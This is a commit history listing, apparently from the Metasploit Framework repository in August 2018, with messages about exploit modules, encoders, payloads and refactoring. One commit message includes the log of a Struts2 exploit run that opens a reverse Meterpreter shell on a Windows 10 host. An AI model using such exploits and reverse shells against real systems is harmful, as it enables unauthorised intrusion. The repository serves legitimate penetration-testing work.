Commit Graph

24602 Commits

Author SHA1 Message Date
alpiste f1e4079641 move add_thread code to lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb 2018-08-28 09:02:21 -05:00
alpiste 015abca8af MSFTidy module 2018-08-28 09:02:21 -05:00
alpiste bb151bb727 MSFTidy module 2018-08-28 09:02:21 -05:00
alpiste 2251c4a712 Add peinjector post module 2018-08-28 09:02:21 -05:00
William Vu 7d21c2094e Improve PSH target and refactor check code 2018-08-27 20:18:35 -05:00
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
2018-08-27 20:01:00 -05:00
Brent Cook 53b369d702 avoid inserting a float into instruction generation randomly 2018-08-27 11:24:38 -05:00
Brent Cook 47ca6c6a14 Land #10527, Fix msftdiy EDB link check, enable HTTPS 2018-08-27 10:49:20 -05:00
Jacob Robles 79b3e4564a Land #10487, add php5 session file target 2018-08-27 06:22:28 -05:00
Brendan Coles 9725e90ba7 Fix msftdiy EDB link check 2018-08-26 04:18:38 +00:00
Brent Cook cb07ba2b6c Land #10516, Add brace expansion encoder and update ${IFS} encoder 2018-08-25 22:23:07 -05:00
William Vu 6df235062b Land #10505, post-auth and default creds info 2018-08-24 18:08:15 -05:00
Brent Cook 51c024982c Land #8914, refactor auxiliary/admin/http credential storage 2018-08-24 13:18:32 -05:00
Brent Cook 0141fc109d don't backtrace if there is not a response 2018-08-24 13:17:06 -05:00
Jacob Robles f6674a96d9 Update poc link 2018-08-24 10:52:01 -05:00
Jacob Robles 7f3824b067 Additional path for Linux target 2018-08-24 07:18:24 -05:00
William Vu 672dbb7acb Land #9364, HP PJL/SNMP CVE-2017-2741 exploit
Finally!
2018-08-23 22:47:09 -05:00
William Vu 318ff95dbd Remove trailing whitespace from netcat payloads
This has been bugging me for so long.
2018-08-23 21:33:58 -05:00
William Vu 4ff2c1dbe8 Add brace expansion encoder 2018-08-23 21:33:43 -05:00
William Vu eeea3356ae Update ${IFS} encoder 2018-08-23 21:33:42 -05:00
Wei Chen 2193dd662d Land #10504, add Foxit Reader UAF Module and Docs 2018-08-23 18:56:07 -05:00
Matthew Kienow ecc6c473d8 Add note about unauthenticated telnetd service 2018-08-23 15:50:41 -04:00
Jacob Robles 7ceae8df58 Remove '.exe' from share name 2018-08-23 14:38:46 -05:00
Matthew Kienow 56433c8ed2 Functional decomposition refactor and cleanup 2018-08-23 15:23:42 -04:00
Matthew Kienow 961769c346 Fix SNMP Null class comparison 2018-08-23 15:23:42 -04:00
Matthew Kienow 9c05f14a70 Modify SNMP null and error handling 2018-08-23 15:23:42 -04:00
Matthew Kienow 934bb38a44 Omit parentheses for no argument method calls 2018-08-23 15:23:41 -04:00
Matthew Kienow c5958c6e38 Restore original rport value 2018-08-23 15:23:41 -04:00
Matthew Kienow 70a0b9b1be Remove payload RequiredCmd and reformat info 2018-08-23 15:23:41 -04:00
Matthew Kienow dafa62dec4 Use string interpolation over concatenation 2018-08-23 15:23:40 -04:00
Matthew Kienow 7c03454a0b Remove unnecessary explicit msf/core require 2018-08-23 15:23:40 -04:00
Matthew Kienow b1a308f3ae Remove final debug output 2018-08-23 15:23:40 -04:00
Matthew Kienow e21ea4180f Clean up module and payload
Update module info, remove intermediate ARCH_ARMLE target, simplify
options and add cleanup command so that the payload kills telnetd
2018-08-23 15:23:40 -04:00
Matthew Kienow 81f1555439 Rename module, exploits multiple printer models 2018-08-23 15:23:40 -04:00
Matthew Kienow df18e354e1 Add bind_busybox_telnetd payload, misc cleanup 2018-08-23 15:23:39 -04:00
Matthew Kienow c0c3e12c74 WIP - hp officejet pro exploit, enhance PJL lib 2018-08-23 14:53:54 -04:00
William Vu 578d2375d7 Add full disclosure for CVE-2018-15473 2018-08-22 14:49:13 -05:00
Wei Chen b899839c53 Oops I made boo-boos 2018-08-21 08:53:43 -05:00
Wei Chen 2780ae6ba9 Update false negatives 2018-08-21 08:50:26 -05:00
Jacob Robles fd6880d0d0 Add Foxit Reader UAF Module and Docs 2018-08-21 08:21:51 -05:00
William Vu 06582a00a0 Add module doc for ssh_enumusers
And update description in module.
2018-08-20 19:26:51 -05:00
Wei Chen ad0291e552 Update false negatives 2018-08-20 18:08:19 -05:00
Brent Cook 11fee8fa2c Land #10471, Import target DefaultOptions into the datastore 2018-08-20 17:30:27 -05:00
Brent Cook d1b8846f12 Land #10479, Add CVE-2018-15473 to ssh_enumusers 2018-08-20 17:14:58 -05:00
William Vu 819b8504e2 Add a little better randomization 2018-08-20 17:10:14 -05:00
William Vu b38a442bb0 Refactor once more with feeling
Also flesh out malformed-packet auth method. Let's not be lazy here. :-)
2018-08-20 16:25:32 -05:00
Wei Chen 01ad152067 Update false negatives on post auth information 2018-08-20 16:05:58 -05:00
Brent Cook e8af2dd67c bool params are truthy, don't cast to a string 2018-08-20 15:53:49 -05:00
Wei Chen 3d0d8f7773 Update false negatives on post auth information 2018-08-20 15:43:07 -05:00
Auxilus 7c3810bbff fix match error in ppc simple nop generator
Before changes:
```
msf5 nop(ppc/simple) > generate 10
[-] Sled generation failed: undefined method `match' for true:TrueClass.
```

After changes:
```
msf5 nop(ppc/simple) > generate 10
buf =
"\x7c\xf6\xc2\x15\x7c\xf6\xc2\x15"
```
2018-08-20 23:16:32 +05:30